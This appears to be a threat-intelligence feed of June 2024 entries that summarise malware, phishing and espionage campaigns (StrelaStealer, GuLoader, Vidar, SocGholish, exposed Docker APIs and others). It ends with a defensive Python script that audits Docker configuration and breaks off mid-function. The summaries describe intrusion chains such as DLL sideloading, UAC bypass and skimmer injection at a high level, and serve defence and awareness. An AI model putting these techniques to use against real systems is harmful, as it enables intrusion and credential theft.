Sonicwall observations indicated a surge in JavaScript spreading StrelaStealer, a credential stealer that targets Outlook and Thunderbird email credentials. The campaign is currently confined to Poland, Spain, Italy, and Germany. The malware employs an obfuscated JavaScript file delivered via email attachments to initiate the attack chain, evading detection through self-copying and encoding techniques. Once executed, it selectively infects non-Russian systems and steals email account information, sending it to a remote server.
Source: https://blog.sonicwall.com/en-us/2024/06/strelastealer-resurgence-tracking-a-javascript-driven-credential-stealer-targeting-europe/
2024-06-25
GuLoader_Malspam_Campaign
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
GuLoader_Malspam_Campaign
Date of Scan:
2024-06-25
Impact:
MEDIUM
Summary:
Rewterz researchers have uncovered GuLoader, a downloader malware that has been active since 2019. It spreads through spam emails containing malicious attachments. Once installed on a computer, GuLoader downloads other malware like AgentTesla, FormBook, and NanoCore. It hides its activities by storing encrypted malware on cloud services like Google Drive and Microsoft OneDrive. GuLoader is difficult to detect because it uses legitimate file-sharing sites that are not closely monitored. It has evolved with advanced techniques to avoid antivirus detection and maintain persistence on infected systems by modifying settings and startup items. To protect against this malware, it is important to have a strong antivirus solution in place and to keep all software up to date with the latest security patches.
Source: https://www.rewterz.com/threat-advisory/guloader-malspam-campaign-active-iocs-3
2024-06-25
UAC_0184s_malware_cmpaign
MEDIUM
+
Intel Source:
Cyble
Intel Name:
UAC_0184s_malware_cmpaign
Date of Scan:
2024-06-25
Impact:
MEDIUM
Summary:
Cyble researchers observed a malware campaign involving a malicious LNK file tied to the UAC-0184 threat actor group. When the LNK shortcut file is executed, it runs a PowerShell script that downloads a ZIP file containing legitimate and malicious Python components, including an encrypted payload. This attack employs DLL sideloading and Shadowloader to execute the XWorm RAT as the final payload.
Source: https://cyble.com/blog/uac-0184-abuses-python-in-dll-sideloading-for-xworm-distribution/
2024-06-25
Caesar_Cipher_Skimmer_Attack
LOW
+
Intel Source:
Sucuri
Intel Name:
Caesar_Cipher_Skimmer_Attack
Date of Scan:
2024-06-25
Impact:
LOW
Summary:
Sucuri researchers have identified a new "gtag" credit card skimming attack called the Caesar Cipher Skimmer, affecting CMS platforms like WordPress, Magento, and OpenCart. This malware injects malicious code into critical PHP files, masquerading as legitimate scripts such as Google Analytics or Google Tag Manager. It uses encryption to avoid detection and connects to remote servers via WebSockets to steal credit card details from compromised sites. Attackers utilize domains with intentional misspellings and frequently change them to evade security measures. This shows the importance of robust website security practices and continuous monitoring to defend against such evolving threats.
Source: https://blog.sucuri.net/2024/06/caesar-cipher-skimmer.html
2024-06-25
Phishing_Incident_Overview
LOW
+
Intel Source:
Any.Run
Intel Name:
Phishing_Incident_Overview
Date of Scan:
2024-06-25
Impact:
LOW
Summary:
Researchers from ANY.RUN have identified a phishing email sent by one of their own employees to everyone in the employee's contact list. Clicking on the email leads to a fake Microsoft sign-in page containing malicious JavaScript. It was soon discovered that the employee's account had been compromised, allowing unauthorized access to conduct a business email compromise (BEC) campaign. The breach occurred due to AiTM phishing tactics and flaws in multi-factor authentication (MFA) policies, enabling the attacker to register their own mobile device for continued access. The attacker then used Perfect Data Software, potentially to back up the entire mailbox, and sent phishing emails to the employee's contacts.
Source: https://any.run/cybersecurity-blog/phishing-incident-report/
2024-06-25
Medusa_reborn
LOW
+
Intel Source:
Cleafy
Intel Name:
Medusa_reborn
Date of Scan:
2024-06-25
Impact:
LOW
Summary:
The Cleafy Threat Intelligence team discovered a new fraud campaign involving the Medusa banking trojan. Medusa is an advanced malware family with RAT capabilities discovered a couple of years ago. Its features include a keylogger, screen controls, and the ability to read/write SMS. Those capabilities enable Threat Actors to perform one of the riskiest fraud scenarios: On-Device Fraud (ODF).
Source: https://www.cleafy.com/cleafy-labs/medusa-reborn-a-new-compact-variant-discovered
2024-06-25
GrimResource_Infection_Technique
LOW
+
Intel Source:
Elastic Security Labs
Intel Name:
GrimResource_Infection_Technique
Date of Scan:
2024-06-25
Impact:
LOW
Summary:
Elastic researchers have discovered a novel command execution mechanism called GrimResource that uses specially crafted MSC (Microsoft Saved Console) files. It allows attackers to execute arbitrary code in the context of mmc.exe if a user clicks on a specially crafted MSC file, with minimal security warnings, making it well suited for obtaining initial access and evading defenses.
Source: https://www.elastic.co/security-labs/grimresource
2024-06-25
CopyCop_Expanding_to_Cover_US_Elections
MEDIUM
+
Intel Source:
Recorded Future
Intel Name:
CopyCop_Expanding_to_Cover_US_Elections
Date of Scan:
2024-06-25
Impact:
MEDIUM
Summary:
Researchers at Recorded Future have discovered that CopyCop, a network using AI-generated and human-crafted content, has changed its focus to cover the 2024 US elections while decreasing attention on Russia's conflict with Ukraine and on domestic politics in France and the UK. It has developed new websites aimed at individual political leaders and relies on a variety of sources, including conservative US media and Russian-aligned outlets, to spread its content.
Source: https://go.recordedfuture.com/hubfs/reports/cta-ru-2024-0624.pdf
2024-06-25
Boolka_Unveiled
MEDIUM
+
Intel Source:
Group-IB
Intel Name:
Boolka_Unveiled
Date of Scan:
2024-06-25
Impact:
MEDIUM
Summary:
Group-IB researchers have identified a threat actor named Boolka spreading the BMANAGER Trojan through websites. Boolka employs the BeEF framework to extract user data from compromised websites and transmit it to their servers. Boolka regularly updates its attack methods and operates through multiple domains to avoid detection. The BMANAGER Trojan is modular, allowing it to perform various malicious tasks such as logging keystrokes and stealing files. Each component of the malware enhances Boolka's ability to gather critical information from infected systems. Boolka demonstrates advanced expertise by using tools like PyInstaller and Python, showcasing their proficiency in developing sophisticated malware.
Source: https://www.group-ib.com/blog/boolka/
2024-06-24
The_GoRed_Backdoor_by_ExCobalt
MEDIUM
+
Intel Source:
PT CSIRT
Intel Name:
The_GoRed_Backdoor_by_ExCobalt
Date of Scan:
2024-06-24
Impact:
MEDIUM
Summary:
Researchers from the PT ESC CSIRT team have discovered a new Go-written backdoor linked to ExCobalt, a cybercrime group evolved from Cobalt known for financial theft. Active since 2016, ExCobalt focuses on cyberespionage, using tools like CobInt since 2022. They target Russian companies, constantly upgrading tools such as GoRed for stealthy data collection, and adapt standard utilities to bypass security, showing expertise in exploiting vulnerabilities.
Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/excobalt-gored-the-hidden-tunnel-technique/
2024-06-24
A_Word_doc_deploys_the_RAT
LOW
+
Intel Source:
Fortinet
Intel Name:
A_Word_doc_deploys_the_RAT
Date of Scan:
2024-06-24
Impact:
LOW
Summary:
This month Fortinet labs' telemetry data observed a Word document (FAKTURA.docx) that deploys the Remcos Remote Access Trojan. The analysts discovered new Indicators of Compromise and more information about where this malware was being sent from. Remcos (Remote Control & Surveillance) RAT malware provides attackers with complete control over an infected system. It can be used for data theft, espionage, and other malicious activities.
Source: https://www.forcepoint.com/blog/x-labs/url-shortener-microsoft-word-remcos-rat-trojan
2024-06-24
Mirai_Botnet_aka_Katana_active_IOCs
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
Mirai_Botnet_aka_Katana_active_IOCs
Date of Scan:
2024-06-24
Impact:
MEDIUM
Summary:
Mirai is malware that infects Internet of Things (IoT) devices, such as routers, security cameras, and other smart devices, to launch distributed denial-of-service (DDoS) attacks. Mirai is very effective because it can exploit the large number of poorly secured IoT devices that are connected to the internet. This makes it difficult to defend against, as many of these devices have limited processing power and memory, and may not receive regular security updates.
Source: https://www.rewterz.com/threat-advisory/mirai-botnet-aka-katana-active-iocs-5
2024-06-24
Fake_IT_Support_Site_Spreads_Vidar_Malware
LOW
+
Intel Source:
Esentire
Intel Name:
Fake_IT_Support_Site_Spreads_Vidar_Malware
Date of Scan:
2024-06-24
Impact:
LOW
Summary:
eSentire's researchers discovered a Vidar Stealer malware infection that begins when a user searches for solutions to a Windows Update error code. The user visits a fake IT support site called PCHelper Wizards, which provides instructions to run a PowerShell script. This script downloads and executes the Vidar Stealer malware using a new variant of Hijack Loader. The process involves downloading files from specific URLs and reporting back to a C2 server. Additionally, a YouTube video linked to this fake support site features automated comments that falsely claim the fix works, attracting more users to run the harmful script. This shows how attackers exploit common IT issues to spread malware by tricking users into visiting fake support sites and running malicious scripts.
Source: https://www.esentire.com/blog/fake-it-support-website-leading-to-vidar-infection
2024-06-24
RedLine_Stealer_active_IOCs
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
RedLine_Stealer_active_IOCs
Date of Scan:
2024-06-24
Impact:
MEDIUM
Summary:
Redline Stealer is a malware that steals sensitive information from infected systems. The malware is distributed through phishing emails, fake software downloads, or other forms of social engineering. Once it is on a victim's computer, Redline Stealer can collect a wide range of information, including login credentials, credit card numbers, and other sensitive data.
Source: https://www.rewterz.com/threat-advisory/redline-stealer-active-iocs-7
2024-06-24
Embargo_ransomware_developed_in_Rust
LOW
+
Intel Source:
Cyble
Intel Name:
Embargo_ransomware_developed_in_Rust
Date of Scan:
2024-06-24
Impact:
LOW
Summary:
Cyble researchers discovered a sample of Embargo ransomware, developed in the Rust programming language. The threat actors were using double extortion to target their victims: in double extortion, the threat actors steal sensitive information from the victim's systems before encrypting the data.
Source: https://cyble.com/blog/the-rust-revolution-new-embargo-ransomware-steps-in/
2024-06-24
Unveiling_SpiceRAT
LOW
+
Intel Source:
Cisco Talos
Intel Name:
Unveiling_SpiceRAT
Date of Scan:
2024-06-24
Impact:
LOW
Summary:
Researchers from Cisco Talos have discovered a new remote access trojan (RAT) named SpiceRAT, used by the threat actor SneakyChef in a campaign targeting government agencies in EMEA and Asia. The attack involved a phishing campaign using the same email address to send both SugarGh0st and SpiceRAT. Two infection chains were identified, using LNK and HTA files as initial attack vectors to deliver SpiceRAT.
Source: https://blog.talosintelligence.com/new-spicerat-sneakychef/
2024-06-24
An_Emerging_Ducktail_Infostealer
LOW
+
Intel Source:
Rewterz
Intel Name:
An_Emerging_Ducktail_Infostealer
Date of Scan:
2024-06-24
Impact:
LOW
Summary:
Ducktail Malware is a malicious program designed by hackers to infiltrate computers and networks worldwide. It is usually delivered through spear-phishing emails containing malicious attachments or links. Once installed, it establishes a presence on the system and starts collecting information. The malware spreads via Facebook URLs that redirect users to suspicious sites, tricking them into downloading malicious files. These files pose significant security risks, such as unauthorized access to sensitive data and system compromise. Ducktail, attributed to a Vietnamese group, has been active since 2021 and it keeps changing its tactics, which means it remains a constant threat to user and system security, especially for Facebook Business accounts.
Source: https://www.rewterz.com/threat-advisory/an-emerging-ducktail-infostealer-active-iocs-9
2024-06-24
APT_29_Targeting_French_Diplomatic_Entities
HIGH
+
Intel Source:
Rewterz
Intel Name:
APT_29_Targeting_French_Diplomatic_Entities
Date of Scan:
2024-06-24
Impact:
HIGH
Summary:
The French information security agency ANSSI reported that the Russia-linked hacking group APT29, also known as Nobelium or Cozy Bear, has been targeting French diplomatic entities through phishing campaigns. These attacks use compromised email accounts to send malicious emails to embassies and agencies, aiming to steal strategic intelligence. Recent incidents include phishing campaigns against European embassies in Kyiv and the French Embassy in Romania. These campaigns are part of broader geopolitical tensions, especially related to Russia's actions against Ukraine. Additionally, Russian hackers were linked to a DDoS attack during the Euro 2024 soccer tournament broadcast in Poland. The attacks pose significant security risks to French and European diplomatic interests.
Source: https://www.rewterz.com/threat-advisory/apt29-targets-french-and-european-diplomatic-entities-in-persistent-cyberattacks-active-iocs
2024-06-24
RedJuliett_Targeting_Taiwanese_Organizations
LOW
+
Intel Source:
Recorded Future
Intel Name:
RedJuliett_Targeting_Taiwanese_Organizations
Date of Scan:
2024-06-24
Impact:
LOW
Summary:
Researchers from Insikt Group have discovered cyber-espionage activities conducted by RedJuliett, a group likely supported by the Chinese government. Their targets include government, academic, technology, and diplomatic organizations in Taiwan. RedJuliett gained initial access by exploiting vulnerabilities in network edge devices such as firewalls, VPNs, and load balancers. Operating possibly from Fuzhou, China, their sustained focus on Taiwan indicates their goal to gather intelligence on Taiwan’s economic, diplomatic, and technological sectors in support of Beijing.
Source: https://www.recordedfuture.com/redjuliett-intensifies-taiwanese-cyber-espionage-via-network-perimeter
2024-06-24
Analysis_of_PHANTOM_SPIKE_attack_campaign
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
Analysis_of_PHANTOM_SPIKE_attack_campaign
Date of Scan:
2024-06-24
Impact:
MEDIUM
Summary:
Securonix Threat Labs researchers have discovered a sophisticated cyber threat campaign named PHANTOM#SPIKE targeting Pakistani victims. Attackers use military-themed phishing documents to lure victims into opening a password-protected ZIP archive that contains the RAT binary. After execution, this malware provides an invisible backdoor for attackers to access the infected systems remotely.
Source: https://www.securonix.com/blog/analysis-of-phantomspike-attackers-leveraging-chm-files-to-run-custom-csharp-backdoors-likely-targeting-victims-associated-with-pakistan/
2024-06-24
CoinMiner_Attacks_on_Korean_Web_Servers
LOW
+
Intel Source:
ASEC
Intel Name:
CoinMiner_Attacks_on_Korean_Web_Servers
Date of Scan:
2024-06-24
Impact:
LOW
Summary:
Researchers at ASEC have discovered attack scenarios in which CoinMiners are installed as a result of targeting a Korean medical institution. The Windows IIS server that was the target of the attack was assumed to be a system running the Picture Archiving and Communication System (PACS) based on the path name where the web shells were uploaded.
Source: https://asec.ahnlab.com/en/66994/
2024-06-21
Earth_Preta_aka_Mustang_Panda_APT_group
HIGH
+
Intel Source:
Rewterz
Intel Name:
Earth_Preta_aka_Mustang_Panda_APT_group
Date of Scan:
2024-06-21
Impact:
HIGH
Summary:
Mustang Panda, aka Bronze President and TA416, has been active for the last couple of years. This threat actor has targeted government agencies, think tanks, NGOs, and even Vatican-affiliated religious institutions in the United States and Europe. Asian countries, such as Taiwan, Hong Kong, Mongolia, Tibet, and Myanmar, were the main focus of past campaigns. The group is notorious for creating phishing lures based on current events that might interest its targets, for example the COVID-19 pandemic, political subjects, and trending issues such as Russian-Ukrainian cyber warfare.
Source: https://www.rewterz.com/threat-advisory/earth-preta-aka-mustang-panda-apt-group-active-iocs-3
2024-06-21
North_Korean_Hackers_Target_Aerospace_and_Defense
MEDIUM
+
Intel Source:
CyberArmor
Intel Name:
North_Korean_Hackers_Target_Aerospace_and_Defense
Date of Scan:
2024-06-21
Impact:
MEDIUM
Summary:
In recent months, North Korean threat actors have escalated their cyber campaigns, targeting Aerospace and Defense sectors with a newly discovered backdoor malware dubbed Niki.
Source: https://cyberarmor.tech/wp-content/uploads/2024/06/New-North-Korean-based-backdoor-packs-a-punch.pdf
2024-06-21
PowerShell_and_XWorm_journey
LOW
+
Intel Source:
Emanueledelucia
Intel Name:
PowerShell_and_XWorm_journey
Date of Scan:
2024-06-21
Impact:
LOW
Summary:
Researcher Emanuele Delucia came across new malware variants and found something that attracted attention. A few days ago he acquired a VBS file, delivered via a malspam campaign against an Italian organization, that was approximately 409 MB in size (sha256:ADF773B49D8306E08B5232039E0DEA143E2C015CDC731F1BE86D7DD92FCCA6A9).
Source: https://www.emanueledelucia.net/a-reverse-engineers-journey-with-powershell-and-xworm/
2024-06-21
ModiLoader_aka_DBatLoader_or_NatsoLoader_IOCs
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
ModiLoader_aka_DBatLoader_or_NatsoLoader_IOCs
Date of Scan:
2024-06-21
Impact:
MEDIUM
Summary:
ModiLoader, also known as DBatLoader or NatsoLoader, was first seen a couple of years ago. This 2-stage loader has been spreading the Remcos, Formbook, and Netwire trojans. This malware is typically delivered through malicious attachments, or by being bundled with legitimate software. It can perform multiple actions, such as downloading and installing additional malware (for example ransomware or banking Trojans), creating a backdoor into the infected device that allows hackers to gain access and control of the device, collecting and exfiltrating sensitive information from the infected device, and many other malicious actions.
Source: https://www.rewterz.com/threat-advisory/modiloader-aka-dbatloader-active-iocs
2024-06-21
SideWinder_APT_group_aka_Rattlesnake_active_IOCs
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
SideWinder_APT_group_aka_Rattlesnake_active_IOCs
Date of Scan:
2024-06-21
Impact:
MEDIUM
Summary:
The SideWinder APT group is a sophisticated cyber espionage group that has been active for more than 10 years. The group is suspected to be based in India and has targeted government agencies, military organizations, and financial institutions in South Asia and the Middle East. The SideWinder APT group is known for using sophisticated tactics and techniques to carry out its attacks.
Source: https://www.rewterz.com/threat-advisory/sidewinder-apt-group-aka-rattlesnake-active-iocs-5
2024-06-21
SneakyChef_group_targets_government_entities
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
SneakyChef_group_targets_government_entities
Date of Scan:
2024-06-21
Impact:
MEDIUM
Summary:
Researchers at Cisco Talos have discovered an ongoing campaign orchestrated by a group named SneakyChef, utilizing the SugarGh0st malware since 2023. This campaign has expanded its targets beyond South Korea and Uzbekistan to various countries across Europe, the Middle East, and Asia. SneakyChef entices victims with forged scanned documents resembling those from government offices, particularly Ministries of Foreign Affairs and embassies. They employ sophisticated tactics, including new methods such as SFX RAR files to propagate SugarGh0st. SneakyChef likely speaks Chinese, based on their language preferences and use of different Gh0st RAT versions. This malware is capable of stealing sensitive information and exhibits persistence, complicating its removal once installed.
Source: https://blog.talosintelligence.com/sneakychef-sugarghost-rat/
2024-06-21
DBatLoader_distributed_as_a_CMD_file
LOW
+
Intel Source:
ASEC
Intel Name:
DBatLoader_distributed_as_a_CMD_file
Date of Scan:
2024-06-21
Impact:
LOW
Summary:
ASEC researchers have discovered that the DBatLoader malware is now spread through CMD files in phishing emails instead of RAR archives containing EXE files. These CMD files are encoded in a way that makes them hard to read unless converted. They don't work on Korean Windows due to different code page settings, but do run on English Windows. The CMD files contain hidden code that decodes and creates a malicious EXE file when run. This file, written in Delphi, can download more harmful data. To avoid these threats, be cautious with unknown emails and keep all software and antivirus programs updated.
Source: https://asec.ahnlab.com/ko/66901/
2024-06-21
SocGholish_Malware
LOW
+
Intel Source:
Sucuri
Intel Name:
SocGholish_Malware
Date of Scan:
2024-06-21
Impact:
LOW
Summary:
Sucuri researchers have uncovered the SocGholish malware. This is a JavaScript malware framework that has been used by cybercriminals since 2017 to trick people into downloading malicious files by pretending to be urgent browser updates. It creates fake update notifications on websites to trick users. Once users download and run these files, the malware installs more dangerous software like Remote Access Trojans (RATs) and infostealers, causing serious security breaches and ransomware attacks. SocGholish also uses compromised domains and WordPress plugins to spread its malware. Common SocGholish campaigns include NDSW/NDSX and khutmhpx, which inject malicious code into websites. In 2024, there has been increased activity from SocGholish groups, indicating that the threat is growing and ongoing.
Source: https://blog.sucuri.net/2024/06/socgholish-malware.html#iocs
2024-06-21
AdsExhaust_delivered_via_fake_Oculus_installer_app
LOW
+
Intel Source:
ESentire
Intel Name:
AdsExhaust_delivered_via_fake_Oculus_installer_app
Date of Scan:
2024-06-21
Impact:
LOW
Summary:
Researchers from ESentire have discovered new adware called AdsExhaust, which is being distributed through a fake Oculus installer application. This adware can take screenshots from infected devices and control browsers by mimicking keystrokes, enabling it to click on ads or redirect the browser to specific websites to make money for the operators. The infection begins when users search for the Oculus application and download a malicious ZIP file from a fake Oculus website. The adware continuously collects data, takes screenshots, and sends this information to a control server. AdsExhaust ensures only one instance runs, interacts with Microsoft Edge to click ads, and hides its activities if it detects user interaction.
Source: https://www.esentire.com/blog/adsexhaust-a-newly-discovered-adware-masquerading-oculus-installer
2024-06-21
InnoSetup_Malware_is_created_with_Each_Download
LOW
+
Intel Source:
ASEC
Intel Name:
InnoSetup_Malware_is_created_with_Each_Download
Date of Scan:
2024-06-21
Impact:
LOW
Summary:
ASEC researchers discovered new malware called InnoLoader posing as fake cracks and commercial tools. Unlike typical malware, InnoLoader displays an installer screen and activates only when the user initiates the installation. It creates unique versions of itself for each download to evade detection and can execute malicious code as directed by its command server. In addition to threats like StealC (which steals information), Socks5Systemz (which uses infected computers as proxies), and Clicker (which mimics a security plugin to boost web traffic), InnoLoader installs legitimate software such as Opera and 360 Security. To hide its operations, the server sometimes sends real software like WinRAR. InnoLoader connects to multiple URLs for downloading and executing files. Another malware, Lu0Bot, helps with communication and maintains persistence by copying itself to the ProgramData directory and creating a startup shortcut.
Source: https://asec.ahnlab.com/ko/66982/
2024-06-20
Chinese_Espionage_Targets_Asian_Telecom_Operators
LOW
+
Intel Source:
Symantec
Intel Name:
Chinese_Espionage_Targets_Asian_Telecom_Operators
Date of Scan:
2024-06-20
Impact:
LOW
Summary:
Researchers from Symantec have discovered a persistent espionage campaign using Chinese-linked tools to breach telecom operators in an Asian country. Active since at least 2021, with potential traces back to 2020, the attackers placed backdoors and attempted credential theft. The primary targets were telecom companies, along with a services firm in the telecom sector and a university in another Asian country.
Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/telecoms-espionage-asia
2024-06-20
A_malicious_campaign_FHAPPI
LOW
+
Intel Source:
Malwaremustdie Blog
Intel Name:
A_malicious_campaign_FHAPPI
Date of Scan:
2024-06-20
Impact:
LOW
Summary:
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (RAT) through process injection. The researcher provides a detailed reverse engineering analysis of the malware components, including decoding multiple layers of obfuscation, identifying the use of PowerSploit code, and tracing the malware's behavior and network communications. The report concludes by attributing the campaign to the threat actor APT10 and providing relevant indicators of compromise.
Source: https://blog.malwaremustdie.org/2024/06/mmd-068-2024-english-report-of-fhappi.html
2024-06-20
Resurgence_and_Evolution_of_Spectre_RAT_v9
LOW
+
Intel Source:
Walmart Global Tech Blog
Intel Name:
Resurgence_and_Evolution_of_Spectre_RAT_v9
Date of Scan:
2024-06-20
Impact:
LOW
Summary:
Researchers from Walmart Global Tech have observed that Spectre RAT has re-emerged in recent campaigns, distributed via a livechat domain with code signing certificates that remain undetected longer than traditional methods. A two-month gap between signed files revealed a new hosting mechanism on cdn-staging[.]livechat-files[.]com, dating back to January 2024. Spectre RAT uses a crypter with timing checks to evade virtual machine detection, allocating and freeing memory while copying the foreground window name into new memory to appear harmless.
Source: https://medium.com/walmartglobaltech/spectre-spc-v9-campaigns-and-updates-546c2e65e247
2024-06-20
A_new_stealer_named_SatanStealer
LOW
+
Intel Source:
Twitter
Intel Name:
A_new_stealer_named_SatanStealer
Date of Scan:
2024-06-20
Impact:
LOW
Summary:
An open-source stealer named "SatanStealer" was published on GitHub. Parts of it are written in Python. Its features include Discord token theft and Discord client injection, collection of registered phone numbers and e-mail addresses, harvesting of browser cookies and saved passwords, theft of cryptocurrency wallet data (Metamask, Atomic, Exodus, Binance, Coinbase, Trust, Phantom), and collection of Telegram, Steam, and Riot Games account information.
Source: https://x.com/MonThreat/status/1802990884255883617?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1802990884255883617%7Ctwgr%5Ee790a40f1f123dfc65c5c04fcde3ea59a2693090%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fcybersecuritynews.com%2Fnew-satanstealer-malware%2F
2024-06-20
Fickle_Stealer_Spread_via_Multiple_Attack_Chains
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Fickle_Stealer_Spread_via_Multiple_Attack_Chains
Date of Scan:
2024-06-20
Impact:
MEDIUM
Summary:
FortiGuard researchers have discovered a new malware called Fickle Stealer, written in the Rust programming language. It infects systems through multiple methods, such as VBA dropper, VBA downloader, link downloader, and executable downloader. These methods mainly download a PowerShell script to begin the infection. The VBA dropper uses a Word document to run a hidden script, while the VBA downloaders use different tricks to download the script. The link downloader and executable downloader, the latter pretending to be a PDF viewer, also spread the malware. Once on the system, the PowerShell scripts bypass User Account Control (UAC) and run the malware, which then creates tasks and injects malicious code. The malware targets sensitive files and applications based on commands from its server and sends stolen data, including screenshots, back to the attacker.
Source: https://www.fortinet.com/blog/threat-research/fickle-stealer-distributed-via-multiple-attack-chain
2024-06-20
Akira_gang_new_attacks_with_the_old_style
MEDIUM
+
Intel Source:
Rexorvc0
Intel Name:
Akira_gang_new_attacks_with_the_old_style
Date of Scan:
2024-06-20
Impact:
MEDIUM
Summary:
Rexorvc0 published a report on the Akira threat actor's recent attack style. Akira is a criminal ransomware group whose main objective is financial gain through extortion. Since 2022 the gang has steadily expanded its list of victims, following methods similar to those of other criminal groups, and it ranks among the principal threat actors by victim count in recent years. The group has used a range of tools, including malware and exploitation of vulnerabilities, during its intrusions. Depending on the victim, phases aimed at defense evasion, lateral movement, and various exfiltration methods were observed, and these have evolved and adapted over time; the ransomware itself has also changed significantly. Akira maintains a close relationship with Conti, the ransomware used by WizardSpider.
Source: https://rexorvc0.com/2024/06/19/Akira-The-Old-New-Style-Crime/
2024-06-19
Info_Stealing_Campaign_Using_DLL_Sideloading
LOW
+
Intel Source:
Trellix
Intel Name:
Info_Stealing_Campaign_Using_DLL_Sideloading
Date of Scan:
2024-06-19
Impact:
LOW
Summary:
In March 2024, researchers at Trellix detected a sophisticated attack targeting users in Latin America and Asia Pacific. The adversaries distribute password-protected archives containing a trojanized Cisco Webex Meetings App (ptService.exe), which executes a stealthy malware loader known as HijackLoader; this loader in turn deploys Vidar Stealer. The attack evades detection by hijacking legitimate processes and applying other defense-evasion tactics.
Source: https://www.trellix.com/blogs/research/how-attackers-repackaged-a-threat-into-something-that-looked-benign/
2024-06-19
New_Loader_Targeting_Chinese_Organizations
LOW
+
Intel Source:
LevelBlue Labs
Intel Name:
New_Loader_Targeting_Chinese_Organizations
Date of Scan:
2024-06-19
Impact:
LOW
Summary:
LevelBlue Labs researchers have found a new, highly evasive malware loader called SquidLoader, delivered through phishing campaigns against specific victims. It uses a range of evasion techniques that hinder both detection and analysis. SquidLoader delivers a second-stage payload, a modified Cobalt Strike sample, indicating that it serves as an initial infection vector for more complex malware. It primarily targets Chinese-speaking victims, but its techniques could be replicated by other threat actors, posing a broader future threat.
Source: https://cybersecurity.att.com/blogs/labs-research/highly-evasive-squidloader-targets-chinese-organizations
2024-06-19
Void_Arachne_Targets_Chinese_Users_with_Winos_4
LOW
+
Intel Source:
Trend Micro
Intel Name:
Void_Arachne_Targets_Chinese_Users_with_Winos_4
Date of Scan:
2024-06-19
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered a new threat actor group named Void Arachne. This group targets Chinese-speaking users by distributing malicious Windows Installer (MSI) files. These MSI files, which appear to be legitimate software installers for AI and other popular applications, are bundled with harmful Windows payloads. Additionally, the campaign distributes compromised MSI files that include nudifiers, deepfake pornography-generating software, and AI-based voice and facial technologies.
Source: https://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html
2024-06-19
Google_Ad_Infects_Matanbuchus_with_DanaBot
LOW
+
Intel Source:
PaloAlto
Intel Name:
Google_Ad_Infects_Matanbuchus_with_DanaBot
Date of Scan:
2024-06-19
Impact:
LOW
Summary:
Researchers at Palo Alto Networks Unit 42 have observed Google ads leading to fake funds-claim sites, which in turn lead to a Matanbuchus infection that drops DanaBot.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-17-IOCs-from-Matanbuchus-infection-with-Danabot.txt
2024-06-18
Online_phishing_scams_related_to_summer_vacations
LOW
+
Intel Source:
Checkpoint
Intel Name:
Online_phishing_scams_related_to_summer_vacations
Date of Scan:
2024-06-18
Impact:
LOW
Summary:
Check Point researchers discovered and warned about online phishing scams connected to summer vacations. One in every 33 new summer vacation-related domains registered in May was malicious or suspicious. Check Point provides examples of vacation-related scams and tips on how to remain vigilant during the holiday season.
Source: https://blog.checkpoint.com/security/protect-yourself-from-summer-vacation-scams-stay-cyber-aware-during-your-vacation/
2024-06-18
New_Campaign_Targeting_Docker_API_Flaws
LOW
+
Intel Source:
Datadog Security Labs
Intel Name:
New_Campaign_Targeting_Docker_API_Flaws
Date of Scan:
2024-06-18
Impact:
LOW
Summary:
Researchers from Datadog Security Labs have discovered a new campaign targeting unauthenticated, publicly exposed Docker API endpoints to spread cryptojacking malware. They identified two new binary payloads: chkstart, a remote access tool that can download and execute additional payloads, and exeremo, a tool for spreading the malware via SSH. The campaign also involves new attacker infrastructure.
Source: https://securitylabs.datadoghq.com/articles/attackers-deploying-new-tactics-in-campaign-targeting-exposed-docker-apis/
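The campaign above depends on Docker Engine API endpoints that accept TCP connections without client authentication. The following is an added example for this entry, not Datadog's code: a small audit that reads the two places a dockerd listener is configured (the `hosts`/`tlsverify` keys of `/etc/docker/daemon.json` and the `-H`/`--host`/`--tlsverify` command-line flags) and reports any `tcp://` listener that lacks mutual TLS. The configuration snippets are constructed, and the fallback port of 2375 for a `tcp://` host without an explicit port is this example's assumption.

```python
"""Audit a Docker daemon configuration for an unauthenticated TCP API listener.

Added example for the Datadog entry above; it is not Datadog's code. The
campaign abuses Docker Engine API endpoints reachable over TCP without client
authentication, so the check looks at the two places that listener is set:
/etc/docker/daemon.json ("hosts", "tlsverify") and the dockerd command line
(-H/--host, --tlsverify). Both sample inputs are constructed.
"""
import json
import shlex
from urllib.parse import urlsplit

# Binding to these addresses exposes the socket on every interface.
PUBLIC_BINDS = {"", "0.0.0.0", "::"}


def tcp_listeners(hosts):
    """Yield (bind_address, port) for every tcp:// entry in a dockerd hosts list.

    Port 2375 is used when none is given (this example's assumption for the
    plaintext default; real deployments should always state the port).
    """
    for h in hosts:
        if h.startswith("tcp://"):
            u = urlsplit(h)
            yield (u.hostname or ""), (u.port or 2375)


def collect_config(daemon_json, cmdline):
    """Merge listener settings from daemon.json and the dockerd argv.

    A real dockerd refuses to start if 'hosts' is set in both places; this
    audit simply unions them so it reports whatever is configured.
    """
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    hosts = list(cfg.get("hosts", []))
    tls_verify = bool(cfg.get("tlsverify", False))

    argv = shlex.split(cmdline)
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 1
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg.startswith("-H") and len(arg) > 2:      # -Htcp://... form
            hosts.append(arg[2:])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tls_verify = True
        i += 1
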